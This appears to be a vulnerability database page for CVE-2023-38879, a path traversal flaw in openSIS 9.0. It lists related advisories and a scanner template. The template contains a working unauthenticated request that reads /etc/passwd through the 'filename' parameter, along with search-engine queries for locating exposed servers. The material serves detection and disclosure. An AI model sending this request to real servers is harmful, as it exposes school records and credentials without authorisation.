| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2023-38879 | 20 Nov 202319:15 | – | attackerkb | |
| CVE-2023-38879 | 27 May 202508:09 | – | circl | |
| Open Solutions For Education openSIS Security Vulnerability | 20 Nov 202300:00 | – | cnnvd | |
| CVE-2023-38879 | 20 Nov 202300:00 | – | cve | |
| CVE-2023-38879 | 20 Nov 202300:00 | – | cvelist | |
| CVE-2023-38879 | 20 Nov 202319:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 201700:00 | – | openvas | |
| CVE-2023-38879 | 20 Nov 202319:15 | – | osv | |
| Directory traversal | 20 Nov 202319:15 | – | prion | |
| PT-2023-26658 · Unknown · Opensis Classic | 20 Nov 202300:00 | – | ptsecurity |
id: CVE-2023-38879
info:
name: openSIS v9.0 - Path Traversal
author: haliteroglu
severity: high
description: |
A path traversal vulnerability exists in openSIS Classic Community Edition v9.0 via the 'filename' parameter in DownloadWindow.php. An unauthenticated remote attacker can exploit this to read arbitrary files on the server by manipulating file paths.
impact: |
Unauthenticated attackers can read arbitrary files from the server by manipulating the filename parameter in DownloadWindow.php, potentially exposing student records, staff information, and database credentials.
remediation: |
Update openSIS to a version newer than 9.0 that validates file paths in DownloadWindow.php and restricts file access to authorized directories only.
reference:
- https://github.com/dub-flow/vulnerability-research/tree/main/CVE-2023-38879
- https://nvd.nist.gov/vuln/detail/CVE-2023-38879
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-38879
cwe-id: CWE-22
epss-score: 0.03663
epss-percentile: 0.88285
cpe: cpe:2.3:a:os4ed:opensis:9.0:*:*:*:community:*:*:*
metadata:
verified: true
max-request: 1
vendor: os4ed
product: opensis
shodan-query: title:"openSIS"
fofa-query: title="openSIS"
tags: cve,cve2023,opensis,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/DownloadWindow.php?filename=../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "filename="
- "text/html"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022029bfc0a8d80bdade50917940855de4ad0e6d2e567956ded9a992fd22aeadc55802210092d0ef97806a7d0c0a15565d78b7f462c65d50abc41b6c10bd08555b5652fa92:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation